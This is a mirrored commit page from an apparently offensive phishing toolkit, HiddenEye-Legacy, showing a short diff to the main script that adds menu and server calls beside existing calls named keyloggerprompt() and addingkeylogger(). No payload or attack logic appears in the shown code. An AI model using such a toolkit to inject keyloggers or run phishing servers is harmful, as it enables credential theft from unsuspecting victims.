mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
v.0.2.6 - RELEASED
This commit is contained in:
parent
e219ea75e5
commit
86c2c62573
@ -24,12 +24,14 @@ readConfig()
|
|||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
try:
|
try:
|
||||||
runMainMenu()
|
runMainMenu()
|
||||||
|
mainMenu()
|
||||||
|
|
||||||
keyloggerprompt()
|
keyloggerprompt()
|
||||||
addingkeylogger()
|
addingkeylogger()
|
||||||
|
|
||||||
inputCustom()
|
inputCustom()
|
||||||
##############
|
##############
|
||||||
|
runServer()
|
||||||
selectServer()
|
selectServer()
|
||||||
|
|
||||||
multiprocessing.Process(target=runServer).start()
|
multiprocessing.Process(target=runServer).start()
|
||||||
|
Loading…
x
Reference in New Issue
Block a user